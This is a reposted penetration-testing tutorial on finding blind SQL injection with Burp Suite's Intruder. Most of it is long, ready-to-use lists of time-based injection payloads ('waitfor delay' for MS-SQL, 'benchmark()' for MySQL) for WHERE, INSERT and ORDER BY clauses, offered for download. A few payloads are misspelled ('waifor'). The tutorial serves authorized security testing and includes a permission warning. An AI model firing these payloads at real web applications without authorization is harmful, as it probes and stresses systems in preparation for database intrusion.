Blind SQL Injection detection with Burp Suite-阿里云开发者社区

1. Introduction

Burp suite is local proxy software (man-in-the-middle application) helping a penetration tester to perform deep analysis and security checks of the HTTP conversation, between a browser and a web application. Burp suite holds many useful plug-ins such as Spider, Repeater, Scanner, Decoder, … for achieving this job.

The module on which we focus on is called Intruder. With this plug-in, you are able to run customised attacks against a Web application, by sending multiple payload type at multiple positions inside the headers/body of an HTTP request, and quickly check against the information responded.

This article provides some intresting SQL payload that you can use with the Intruder module of Burp suite.

Warning: Don’t use this tutorial against web applications if you are not the owner or have the authorization of the responsible.

2. SQL Injection detection

As you know, detect an SQL injection issue “manually” could be easy to do. But it is not always true for an “automatic” vulnerability scanner. That’s why we would like to give a second chance to detect such vulnerabilities with smart “customized attacks“ of Burp suite.

In order to find SQL injection issues behind specific parameters of a page, we will simply use some usual time-base consuming SQL statements such as “waitfor delay” (for MS-SQL) and “benchmark()” (for MySQL), and sort the HTTP responses by “Response Time Completed“. By this way, we will able to quickly find the interesting responses among the list.

3. Burp Suite example

This is a short example of a blind SQL injection detection with Burp suite (we assume you already have some knowledge of Burp suite usage. If not, enjoy this tool).

First, we send a recorded HTTP request to the Intruder module and set up the position where the payload will have to be injected (in red).

Next, we load our Payloads list (see next section) from a text file. These payloads will use the benchmarck() MySQL function, and will ask to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space in the list “URL-encode these characters” (on the bottom of the page) if there is no one already.

And then we start the attack (see Intruder menu).

When it will be finished, the responses will be displayed in a table format. Here we have sorted the result by “Response complete” to get immediately which payloads have triggered the vulnerability.

As you see on the previous screenshot, request 27 took more than 17 seconds to complete with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement was :

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) # OR mid="1"

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we will not be able to provide an exhaustive list of payloads for each kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1 WHERE/ASSIGNATION

Which should match statements such as:

SELECT a FROM tbl WHERE item=x payload
DELETE FROM tbl WHERE item=x payload
UPDATE tbl SET item1=x payload1 WHERE item2=x payload2

4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2 )

UPDATE tbl(a,b) SET VALUES(x payload1, y payload2) WHERE item=value

4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl <WHERE ...> ORDER BY value,payload1 ASC,payload2

5. The Payloads

So far, we will try to focus on MSSQL (using “waitfor delay“ command to introduce time delay) and MySQL Server (using benchmark() function to generate long CPU activities).

For each injection, we will:

use quote, double-quote, parenthesis or blank characters to close everything written before the injected payload.
play with multiple level of parenthesis.
ending the SQL statement with { /* , – } for MSSQL, and { /* , – , # } for MySQL.
for insert only: try different number of columns for values().

5.1. Download

Download the full list of payloads: payloads-sql-blind.tar.gz

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt

payloads-sql-blind-MSSQL-WHERE.txt

payloads-sql-blind-MySQL-INSERT.txt

payloads-sql-blind-MySQL-WHERE.txt

payloads-sql-blind-MySQL-ORDER_BY.txt

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/*

)%20waitfor%20delay%20'0:0:20'%20--

')%20waitfor%20delay%20'0:0:20'%20/*

')%20waitfor%20delay%20'0:0:20'%20--

")%20waitfor%20delay%20'0:0:20'%20/*

")%20waitfor%20delay%20'0:0:20'%20--

))%20waitfor%20delay%20'0:0:20'%20/*

))%20waitfor%20delay%20'0:0:20'%20--

'))%20waitfor%20delay%20'0:0:20'%20/*

'))%20waitfor%20delay%20'0:0:20'%20--

"))%20waitfor%20delay%20'0:0:20'%20/*

"))%20waitfor%20delay%20'0:0:20'%20--

,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL)%20waifor%20delay%20'0:0:20'%20/*

',NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL)%20waifor%20delay%20'0:0:20'%20/*

'),NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*

"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

 waitfor delay '0:0:20' /*

waitfor delay '0:0:20' --

' waitfor delay '0:0:20' /*

' waitfor delay '0:0:20' --

" waitfor delay '0:0:20' /*

" waitfor delay '0:0:20' --

) waitfor delay '0:0:20' /*

) waitfor delay '0:0:20' --

)) waitfor delay '0:0:20' /*

)) waitfor delay '0:0:20' --

))) waitfor delay '0:0:20' /*

))) waitfor delay '0:0:20' --

)))) waitfor delay '0:0:20' /*

)))) waitfor delay '0:0:20' --

))))) waitfor delay '0:0:20' --

)))))) waitfor delay '0:0:20' --

') waitfor delay '0:0:20' /*

') waitfor delay '0:0:20' --

") waitfor delay '0:0:20' /*

") waitfor delay '0:0:20' --

')) waitfor delay '0:0:20' /*

')) waitfor delay '0:0:20' --

")) waitfor delay '0:0:20' /*

")) waitfor delay '0:0:20' --

'))) waitfor delay '0:0:20' /*

'))) waitfor delay '0:0:20' --

"))) waitfor delay '0:0:20' /*

"))) waitfor delay '0:0:20' --

')))) waitfor delay '0:0:20' /*

')))) waitfor delay '0:0:20' --

")))) waitfor delay '0:0:20' /*

")))) waitfor delay '0:0:20' --

'))))) waitfor delay '0:0:20' /*

'))))) waitfor delay '0:0:20' --

"))))) waitfor delay '0:0:20' /*

"))))) waitfor delay '0:0:20' --

')))))) waitfor delay '0:0:20' /*

')))))) waitfor delay '0:0:20' --

")))))) waitfor delay '0:0:20' /*

")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--

"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

 and 0=benchmark(3000000,MD5(1))%20/*

and 0=benchmark(3000000,MD5(1))%20--

and 0=benchmark(3000000,MD5(1))%20%23

' and 0=benchmark(3000000,MD5(1))%20/*

' and 0=benchmark(3000000,MD5(1))%20--

' and 0=benchmark(3000000,MD5(1))%20%23

" and 0=benchmark(3000000,MD5(1))%20/*

" and 0=benchmark(3000000,MD5(1))%20--

" and 0=benchmark(3000000,MD5(1))%20%23

) and 0=benchmark(3000000,MD5(1))%20/*

) and 0=benchmark(3000000,MD5(1))%20--

) and 0=benchmark(3000000,MD5(1))%20%23

)) and 0=benchmark(3000000,MD5(1))%20/*

)) and 0=benchmark(3000000,MD5(1))%20--

)) and 0=benchmark(3000000,MD5(1))%20%23

))) and 0=benchmark(3000000,MD5(1))%20/*

))) and 0=benchmark(3000000,MD5(1))%20--

))) and 0=benchmark(3000000,MD5(1))%20%23

)))) and 0=benchmark(3000000,MD5(1))%20/*

)))) and 0=benchmark(3000000,MD5(1))%20--

)))) and 0=benchmark(3000000,MD5(1))%20%23

') and 0=benchmark(3000000,MD5(1))%20/*

') and 0=benchmark(3000000,MD5(1))%20--

') and 0=benchmark(3000000,MD5(1))%20%23

") and 0=benchmark(3000000,MD5(1))%20/*

") and 0=benchmark(3000000,MD5(1))%20--

") and 0=benchmark(3000000,MD5(1))%20%23

')) and 0=benchmark(3000000,MD5(1))%20/*

')) and 0=benchmark(3000000,MD5(1))%20--

')) and 0=benchmark(3000000,MD5(1))%20%23

")) and 0=benchmark(3000000,MD5(1))%20/*

")) and 0=benchmark(3000000,MD5(1))%20--

")) and 0=benchmark(3000000,MD5(1))%20%23

'))) and 0=benchmark(3000000,MD5(1))%20/*

'))) and 0=benchmark(3000000,MD5(1))%20--

'))) and 0=benchmark(3000000,MD5(1))%20%23

"))) and 0=benchmark(3000000,MD5(1))%20/*

"))) and 0=benchmark(3000000,MD5(1))%20--

"))) and 0=benchmark(3000000,MD5(1))%20%23

')))) and 0=benchmark(3000000,MD5(1))%20/*

')))) and 0=benchmark(3000000,MD5(1))%20--

')))) and 0=benchmark(3000000,MD5(1))%20%23

")))) and 0=benchmark(3000000,MD5(1))%20/*

")))) and 0=benchmark(3000000,MD5(1))%20--

")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*

"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--

"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

6. The End

Enjoy this tutorial and these SQL payloads.

New payloads suggestions are welcome !

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/499917，如需转载请自行联系原作者

Blind SQL Injection detection with Burp Suite

1. Introduction

2. SQL Injection detection

3. Burp Suite example

4. SQL injection entry points

4.1 WHERE/ASSIGNATION

4.2. INSERT/UPDATE

4.3. ORDER BY/ASC/DESC

5. The Payloads

5.1. Download

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt

payloads-sql-blind-MSSQL-WHERE.txt

payloads-sql-blind-MySQL-INSERT.txt

payloads-sql-blind-MySQL-WHERE.txt

payloads-sql-blind-MySQL-ORDER_BY.txt

6. The End

热门文章

最新文章

相关课程

相关电子书

探索云世界

热门

云计算

大数据

云原生

人工智能

数据库

开发与运维

活动广场

任务中心

训练营

直播

乘风者计划

下载

镜像站

技术资料

Blind SQL Injection detection with Burp Suite

1. Introduction

2. SQL Injection detection

3. Burp Suite example

4. SQL injection entry points

4.1 WHERE/ASSIGNATION

4.2. INSERT/UPDATE

4.3. ORDER BY/ASC/DESC

5. The Payloads

5.1. Download

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt

payloads-sql-blind-MSSQL-WHERE.txt

payloads-sql-blind-MySQL-INSERT.txt

payloads-sql-blind-MySQL-WHERE.txt

payloads-sql-blind-MySQL-ORDER_BY.txt

6. The End

热门文章

最新文章

相关课程

相关电子书